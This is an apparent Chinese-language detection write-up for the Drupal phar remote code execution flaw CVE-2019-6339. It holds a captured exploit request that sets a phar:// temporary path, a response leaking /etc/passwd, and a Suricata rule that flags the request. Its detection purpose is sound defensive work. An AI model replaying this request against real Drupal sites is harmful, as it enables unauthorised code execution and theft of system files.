T1190-CVE-2019-6339-Drupal 远程代码执行漏洞
来自ATT&CK的描述
使用软件,数据或命令来利用面向Internet的计算机系统或程序中的弱点,从而导致意外或无法预期的行为。系统的弱点可能是错误、故障或设计漏洞。这些应用程序通常是网站,但是可以包括数据库(例如SQL),标准服务(例如SMB 或SSH)以及具有Internet可访问开放的任何其他应用程序,例如Web服务器和相关服务。根据所利用的缺陷,这可能包括“利用防御防卫”。
如果应用程序托管在基于云的基础架构上,则对其进行利用可能会导致基础实际应用受到损害。这可以使攻击者获得访问云API或利用弱身份和访问管理策略的路径。
对于网站和数据库,OWASP排名前10位和CWE排名前25位突出了最常见的基于Web的漏洞。
测试案例
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。人们通常将Drupal拿来和另一个著名的开源CMS,即Joomla进行比较。由于“难度”更大而中文资源较Joomla更少,Drupal在中国的普及程度较Joomla更低。
Drupal core 7.62之前的7.x版本、8.6.6之前的8.6.x版本和8.5.9之前的8.5.x版本中的内置phar stream wrapper(PHP)存在远程代码执行漏洞。远程攻击者可利用该漏洞执行任意的php代码。
在Drupal Core版本7.x之前的7.62,8.6.x之前的8.6.6和8.5.x之前的8.5.x; 在对phar://URI执行文件操作时,PHP的内置phar流包装器中存在一个远程执行代码漏洞。一些Drupal代码(core,contrib和custom)可能正在对用户输入执行文件操作,从而暴露于此漏洞。
检测日志
HTTP
测试复现
具体利用过程可参考:https://blog.csdn.net/qq_40989258/article/details/104970882
测试留痕
POST /admin/config/media/file-system HTTP/1.1
Host: 172.17.41.106:8080
Connection: keep-alive
Content-Length: 340
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.17.41.106:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.17.41.106:8080/admin/config/media/file-system
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,be;q=0.8
Cookie: 8ciy_2132_ulastactivity=1747%2BBj3bIdraT%2FhUrMgbV9hBzsnRDad5PbJ4P8FXwvrlsfGVbOx; 8ciy_2132_nofavfid=1; 8ciy_2132_saltkey=h7AR59Bx; 8ciy_2132_lastvisit=1603172255; SESS69d0dbb3a7ccb7aab441a7efa90bb8ae=WSVdSnEkxmap5tU9TGG21HegyssjX2hEk8BkBOBEyiU
file_temporary_path=phar%3A%2F%2F.%2Fsites%2Fdefault%2Ffiles%2Fpictures%2F2020-10%2Fblog-ZDI-CAN-7232-cat.jpg&file_default_scheme=public&temporary_maximum_age=21600&form_build_id=form-iN0z3-CojyQl7PlFGKxsy68XNcyvFaBLtQY_ffo-efA&form_token=VUzTpwLaFD0IW9_2rt9ntjULAJ_euh4ZmJkcEJAdEfI&form_id=system_file_system_settings&op=Save+configurationHTTP/1.1 200 OK
Date: Wed, 21 Oct 2020 07:58:45 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.2.3
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 5215
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
<!DOCTYPE html>
<html lang="en" dir="ltr" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# schema: http://schema.org/ sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema# ">
<head>
<meta charset="utf-8" />
<noscript><meta http-equiv="Refresh" content="0; URL=/big_pipe/no-js?destination=/admin/config/media/file-system" />
</noscript><meta name="Generator" content="Drupal 8 (https://www.drupal.org)" />
<meta name="MobileOptimized" content="width" />
<meta name="HandheldFriendly" content="true" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="shortcut icon" href="/core/misc/favicon.ico" type="image/vnd.microsoft.icon" />
<title>File system | drupal</title>
<link rel="stylesheet" href="/sites/default/files/css/css_U8KsIL9-p4iwTqZpkdfkA6i7Xu4DQ29N9DEp1Suvl74.css?0" media="all" />
<link rel="stylesheet" href="/sites/default/files/css/css_Va4zLdYXDM0x79wYfYIi_RSorpNS_xtrTcNUqq0psQA.css?0" media="screen" />
<link rel="stylesheet" href="/sites/default/files/css/css_UHkVktzxzRp3Q1t6ZHUZJOcy7NuH6r_v1SicD60WiKQ.css?0" media="all" />
<link rel="stylesheet" href="/sites/default/files/css/css_yPXzUqDWCKESqAn18LazKt4XtPbSaHRtJYq74XoubYg.css?0" media="all" />
<!--[if lte IE 8]>
<script src="/sites/default/files/js/js_VtafjXmRvoUgAzqzYTA3Wrjkx9wcWhjP0G4ZnnqRamA.js"></script>
<![endif]-->
<script src="/core/assets/vendor/modernizr/modernizr.min.js?v=3.3.1"></script>
</head>
<body class="toolbar-tray-open toolbar-horizontal toolbar-fixed toolbar-loading user-logged-in path-admin">
<a href="#main-content" class="visually-hidden focusable skip-link">
Skip to main content
</a>
<div id="toolbar-administration" role="group" aria-label="Site administration toolbar" class="toolbar">
<nav id="toolbar-bar" role="navigation" aria-label="Toolbar items" class="toolbar-bar clearfix">
<h2 class="visually-hidden">Toolbar items</h2>
<div class="home-toolbar-tab toolbar-tab">
<a href="/" title="Return to site content" class="toolbar-icon toolbar-icon-escape-admin toolbar-item" data-toolbar-escape-admin>Back to site</a>
<div><nav class="toolbar-lining clearfix" role="navigation"></nav></div> </div>
<div class="toolbar-tab">
<a href="/admin" title="Admin menu" class="toolbar-icon toolbar-icon-menu trigger toolbar-item" data-drupal-subtrees="" id="toolbar-item-administration" data-toolbar-tray="toolbar-item-administration-tray" aria-owns="toolbar-item-administration-tray" role="button" aria-pressed="false">Manage</a>
<div id="toolbar-item-administration-tray" data-toolbar-tray="toolbar-item-administration-tray" class="toolbar-tray"><nav class="toolbar-lining clearfix" role="navigation" aria-label="Administration menu"><h3 class="toolbar-tray-name visually-hidden">Administration menu</h3><div class="toolbar-menu-administration"><ul class="toolbar-menu"><li class="menu-item menu-item--collapsed"><a href="/admin/content" title="Find and manage content." id="toolbar-link-system-admin_content" class="toolbar-icon toolbar-icon-system-admin-content" data-drupal-link-system-path="admin/content">Content</a></li><li class="menu-item menu-item--collapsed"><a href="/admin/structure" title="Administer blocks, content types, menus, etc." id="toolbar-link-system-admin_structure" class="toolbar-icon toolbar-icon-system-admin-structure" data-drupal-link-system-path="admin/structure">Structure</a></li><li class="menu-item"><a href="/admin/appearance" title="Select and configure themes." id="toolbar-link-system-themes_page" class="toolbar-icon toolbar-icon-system-themes-page" data-drupal-link-system-path="admin/appearance">Appearance</a></li><li class="menu-item"><a href="/admin/modules" title="Add and enable modules to extend site functionality." id="toolbar-link-system-modules_list" class="toolbar-icon toolbar-icon-system-modules-list" data-drupal-link-system-path="admin/modules">Extend</a></li><li class="menu-item menu-item--collapsed"><a href="/admin/config" title="Administer settings." id="toolbar-link-system-admin_config" class="toolbar-icon toolbar-icon-system-admin-config" data-drupal-link-system-path="admin/config">Configuration</a></li><li class="menu-item"><a href="/admin/people" title="Manage user accounts, roles, and permissions." id="toolbar-link-entity-user-collection" class="toolbar-icon toolbar-icon-entity-user-collection" data-drupal-link-system-path="admin/people">People</a></li><li class="menu-item menu-item--collapsed"><a href="/admin/reports" title="View reports, updates, and errors." id="toolbar-link-system-admin_reports" class="toolbar-icon toolbar-icon-system-admin-reports" data-drupal-link-system-path="admin/reports">Reports</a></li><li class="menu-item"><a href="/admin/help" title="Reference for usage, configuration, and modules." id="toolbar-link-help-main" class="toolbar-icon toolbar-icon-help-main" data-drupal-link-system-path="admin/help">Help</a></li></ul></div></nav></div> </div>
<div class="toolbar-tab">
<a href="/admin/config/user-interface/shortcut" title="Shortcuts" class="toolbar-icon toolbar-icon-shortcut trigger toolbar-item" id="toolbar-item-shortcuts" data-toolbar-tray="toolbar-item-shortcuts-tray" aria-owns="toolbar-item-shortcuts-tray" role="button" aria-pressed="false">Shortcuts</a>
<div id="toolbar-item-shortcuts-tray" data-toolbar-tray="toolbar-item-shortcuts-tray" class="toolbar-tray"><nav class="toolbar-lining clearfix" role="navigation" aria-label="User-defined shortcuts"><h3 class="toolbar-tray-name visually-hidden">User-defined shortcuts</h3><ul class="toolbar-menu"><li><a href="/node/add">Add content</a></li><li><a href="/admin/content">All content</a></li></ul><a href="/admin/config/user-interface/shortcut/manage/default/customize" class="edit-shortcuts">Edit shortcuts</a></nav></div> </div>
<div class="hidden contextual-toolbar-tab toolbar-tab">
<button class="toolbar-icon toolbar-icon-edit toolbar-item" aria-pressed="false" type="button">Edit</button>
<div><nav class="toolbar-lining clearfix" role="navigation"></nav></div> </div>
<div class="tour-toolbar-tab hidden toolbar-tab" id="toolbar-tab-tour">
<button class="toolbar-icon toolbar-icon-help toolbar-item" aria-pressed="false" type="button">Tour</button>
<div><nav class="toolbar-lining clearfix" role="navigation"></nav></div> </div>
<div class="toolbar-tab">
<a href="/user" title="My account" class="toolbar-icon toolbar-icon-user trigger toolbar-item" id="toolbar-item-user" data-toolbar-tray="toolbar-item-user-tray" aria-owns="toolbar-item-user-tray" role="button" aria-pressed="false">admin</a>
<div id="toolbar-item-user-tray" data-toolbar-tray="toolbar-item-user-tray" class="toolbar-tray"><nav class="toolbar-lining clearfix" role="navigation" aria-label="User account actions"><h3 class="toolbar-tray-name visually-hidden">User account actions</h3><ul class="toolbar-menu"><li class="account"><a href="/user" title="User account">View profile</a></li><li class="account-edit"><a href="/user/1/edit" title="Edit user account">Edit profile</a></li><li class="logout"><a href="/user/logout">Log out</a></li></ul></nav></div> </div>
</nav>
</div>
<div class="dialog-off-canvas-main-canvas" data-off-canvas-main-canvas>
<header class="content-header clearfix">
<div class="layout-container">
<div class="region region-header">
<div id="block-seven-page-title" class="block block-core block-page-title-block">
<h1 class="js-quickedit-page-title page-title">File system</h1>
<a href="/admin/config/user-interface/shortcut/manage/default/add-link-inline?link=admin/config/media/file-system&name=File%20system&destination=/admin/config/media/file-system&token=flS1Fo4ABnGysV5WkcZ2RBFadVpFgQ63k_MtjYRuPHE" class="shortcut-action shortcut-action--add"><span class="shortcut-action__icon"></span><span class="shortcut-action__message">Add to <em class="placeholder">Default</em> shortcuts</span></a>
</div>
</div>
</div>
</header>
<div class="layout-container">
<div class="region region-breadcrumb">
<div id="block-seven-breadcrumbs" class="block block-system block-system-breadcrumb-block">
<nav class="breadcrumb" role="navigation" aria-labelledby="system-breadcrumb">
<h2 id="system-breadcrumb" class="visually-hidden">Breadcrumb</h2>
<ol>
<li>
<a href="/">Home</a>
</li>
<li>
<a href="/admin">Administration</a>
</li>
<li>
<a href="/admin/config">Configuration</a>
</li>
<li>
<a href="/admin/config/media">Media</a>
</li>
</ol>
</nav>
</div>
</div>
<main class="page-content clearfix" role="main">
<div class="visually-hidden"><a id="main-content" tabindex="-1"></a></div>
<div class="region region-highlighted">
<div role="contentinfo" aria-label="Error message" class="messages messages--error">
<div role="alert">
<h2 class="visually-hidden">Error message</h2>
The directory <em class="placeholder">phar://./sites/default/files/pictures/2020-10/blog-ZDI-CAN-7232-cat.jpg</em> does not exist and could not be created.
</div>
</div>
</div>
<div class="help">
</div>
<div class="region region-content">
<div id="block-seven-content" class="block block-system block-system-main-block">
<form class="system-file-system-settings" data-drupal-selector="system-file-system-settings" action="/admin/config/media/file-system" method="post" id="system-file-system-settings" accept-charset="UTF-8">
<div id="edit-file-public-path" class="js-form-item form-item js-form-type-item form-type-item js-form-item-file-public-path form-item-file-public-path">
<label for="edit-file-public-path">Public file system path</label>
sites/default/files
<div id="edit-file-public-path--description" class="description">
A local file system path where public files will be stored. This directory must exist and be writable by Drupal. This directory must be relative to the Drupal installation directory and be accessible over the web. This must be changed in settings.php
</div>
</div>
<div id="edit-file-public-base-url" class="js-form-item form-item js-form-type-item form-type-item js-form-item-file-public-base-url form-item-file-public-base-url">
<label for="edit-file-public-base-url">Public file base URL</label>
http://172.17.41.106:8080/sites/default/files
<div id="edit-file-public-base-url--description" class="description">
The base URL that will be used for public file URLs. This can be changed in settings.php
</div>
</div>
<div id="edit-file-private-path" class="js-form-item form-item js-form-type-item form-type-item js-form-item-file-private-path form-item-file-private-path">
<label for="edit-file-private-path">Private file system path</label>
Not set
<div id="edit-file-private-path--description" class="description">
An existing local file system path for storing private files. It should be writable by Drupal and not accessible over the web. This must be changed in settings.php
</div>
</div>
<div class="js-form-item form-item js-form-type-textfield form-type-textfield js-form-item-file-temporary-path form-item-file-temporary-path">
<label for="edit-file-temporary-path">Temporary directory</label>
<input data-drupal-selector="edit-file-temporary-path" aria-describedby="edit-file-temporary-path--description" type="text" id="edit-file-temporary-path" name="file_temporary_path" value="phar://./sites/default/files/pictures/2020-10/blog-ZDI-CAN-7232-cat.jpg" size="60" maxlength="255" class="form-text error" aria-invalid="true" />
<div id="edit-file-temporary-path--description" class="description">
A local file system path where temporary files will be stored. This directory should not be accessible over the web.
</div>
</div>
<fieldset data-drupal-selector="edit-file-default-scheme" aria-describedby="edit-file-default-scheme--wrapper--description" id="edit-file-default-scheme--wrapper" class="fieldgroup form-composite js-form-item form-item js-form-wrapper form-wrapper">
<legend>
<span class="fieldset-legend">Default download method</span>
</legend>
<div class="fieldset-wrapper">
<div id="edit-file-default-scheme" class="form-radios"><div class="js-form-item form-item js-form-type-radio form-type-radio js-form-item-file-default-scheme form-item-file-default-scheme">
<input data-drupal-selector="edit-file-default-scheme-public" aria-describedby="edit-file-default-scheme--description" type="radio" id="edit-file-default-scheme-public" name="file_default_scheme" value="public" checked="checked" class="form-radio" />
<label for="edit-file-default-scheme-public" class="option">Public local files served by the webserver.</label>
</div>
</div>
<div id="edit-file-default-scheme--wrapper--description" class="description">This setting is used as the preferred download method. The use of public files is more efficient, but does not provide any access control.</div>
</div>
</fieldset>
<div class="js-form-item form-item js-form-type-select form-type-select js-form-item-temporary-maximum-age form-item-temporary-maximum-age">
<label for="edit-temporary-maximum-age">Delete temporary files after</label>
<select data-drupal-selector="edit-temporary-maximum-age" aria-describedby="edit-temporary-maximum-age--description" id="edit-temporary-maximum-age" name="temporary_maximum_age" class="form-select"><option value="0">Never</option><option value="21600" selected="selected">6 hours</option><option value="43200">12 hours</option><option value="86400">1 day</option><option value="604800">1 week</option><option value="2419200">4 weeks</option><option value="7776000">3 months</option></select>
<div id="edit-temporary-maximum-age--description" class="description">
Temporary files are not referenced, but are in the file system and therefore may show up in administrative lists. <strong>Warning:</strong> If enabled, temporary files will be permanently deleted and may not be recoverable.
</div>
</div>
<input autocomplete="off" data-drupal-selector="form-xxnkpoc7rzwnq4z5jmb-mz1kjulxko1wlfebmesxg0e" type="hidden" name="form_build_id" value="form-XXNkPoC7rZwnq4z5JMb-mz1KJulxKo1WLFEbmESXg0E" />
<input data-drupal-selector="edit-system-file-system-settings-form-token" type="hidden" name="form_token" value="VUzTpwLaFD0IW9_2rt9ntjULAJ_euh4ZmJkcEJAdEfI" />
<input data-drupal-selector="edit-system-file-system-settings" type="hidden" name="form_id" value="system_file_system_settings" />
<div data-drupal-selector="edit-actions" class="form-actions js-form-wrapper form-wrapper" id="edit-actions"><input data-drupal-selector="edit-submit" type="submit" id="edit-submit" name="op" value="Save configuration" class="button button--primary js-form-submit form-submit" />
</div>
</form>
</div>
</div>
</main>
</div>
</div>
<script type="application/json" data-drupal-selector="drupal-settings-json">{"path":{"baseUrl":"\/","scriptPath":null,"pathPrefix":"","currentPath":"admin\/config\/media\/file-system","currentPathIsAdmin":true,"isFront":false,"currentLanguage":"en"},"pluralDelimiter":"\u0003","ajaxPageState":{"libraries":"classy\/base,classy\/messages,contextual\/drupal.contextual-links,contextual\/drupal.contextual-toolbar,core\/drupal.active-link,core\/html5shiv,core\/normalize,seven\/global-styling,shortcut\/drupal.shortcut,toolbar\/toolbar,toolbar\/toolbar.escapeAdmin,tour\/tour,user\/drupal.user.icons","theme":"seven","theme_token":"dSH29E-Om61JkNx9kdM-3k77DozHJOeg_hetRt6HTOo"},"ajaxTrustedUrl":{"form_action_p_pvdeGsVG5zNF_XLGPTvYSKCf43t8qZYSwcfZl2uzM":true},"toolbar":{"breakpoints":{"toolbar.narrow":"only screen and (min-width: 16.5em)","toolbar.standard":"only screen and (min-width: 38.125em)","toolbar.wide":"only screen and (min-width: 61em)"},"subtreesHash":"q5SbYHg6y4E5ktkc8Idp0_YGhICDGzYrK47EstXN08M"},"user":{"uid":"1","permissionsHash":"d050762cf90cd597087f492abb3a179258136b50c38a41d068c2cca748489bc0"}}</script>
<script src="/sites/default/files/js/js_BKcMdIbOMdbTdLn9dkUq3KCJfIKKo2SvKoQ1AnB8D-g.js"></script>
<!--[if lte IE 9]>
<script src="/sites/default/files/js/js_VhqXmo4azheUjYC30rijnR_Dddo0WjWkF27k5gTL8S4.js"></script>
<![endif]-->
<script src="/sites/default/files/js/js_vmYBmsMCxrmurAYwjC1NnhJYlQfB1pS1mAlU__M2ar8.js"></script>
</body>
</html>
检测规则/思路
Suricata规则
alert http any any -> any any (msg:"CVE-2019-6339-Drupal远程代码执行漏洞";flow:established,to_server;content:"POST";http_method;content:"/admin/config/media/file-system";http_uri;content:"phar%3A%2F%2F.%2Fsites%2Fdefault%2Ffiles%2Fpictures%2F";http_client_body;reference:url,blog.csdn.net/qq_40989258/article/details/104970882;classtype:web-application-attck;sid:3002021;rev:1;)
建议
流量+安全设备比较容易检测到此攻击行为。
参考推荐
MITRE-ATT&CK-T1190
https://attack.mitre.org/techniques/T1190/
(环境搭建+复现) CVE-2019-6339 Drupal远程代码执行漏洞